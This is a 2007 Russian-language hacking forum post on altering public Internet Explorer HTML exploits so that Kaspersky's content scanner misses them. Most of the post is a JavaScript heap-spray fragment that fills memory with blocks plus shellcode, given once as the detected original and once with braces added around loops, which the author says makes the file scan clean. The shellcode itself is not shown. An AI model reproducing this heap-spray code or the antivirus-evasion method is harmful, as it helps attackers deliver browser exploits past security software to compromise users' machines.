Тема: Обфускация html public-эксплоитов для IE (проверял на касперыче)
Показать сообщение отдельно

Обфускация html public-эксплоитов для IE (проверял на касперыче)
  #1  
Старый 18.01.2007, 20:53
sn0w
Статус пользователя:
Регистрация: 26.07.2005
Сообщений: 568
Провел на форуме:
1290766

Репутация: 1236


По умолчанию Обфускация html public-эксплоитов для IE (проверял на касперыче)
Для того чтоб наибсти анализатор контента, например касперычевский (тестил онлайн версию), делаем простой экспанд блочных функций (обычно циклы):

оригинал эксплоита (палится):
...
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<350;i++) memory[i] = block + shellcode;
...


модификация (нипалица):
...
while (bigblock.length<slackspace){bigblock+=bigblock;}
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000){block = block+block+fillblock;}
memory = new Array();
for (i=0;i<350;i++){memory[i] = block + shellcode;}
...

+ тестим...
+ файл чист
__________________


snow white world wide
 
Ответить с цитированием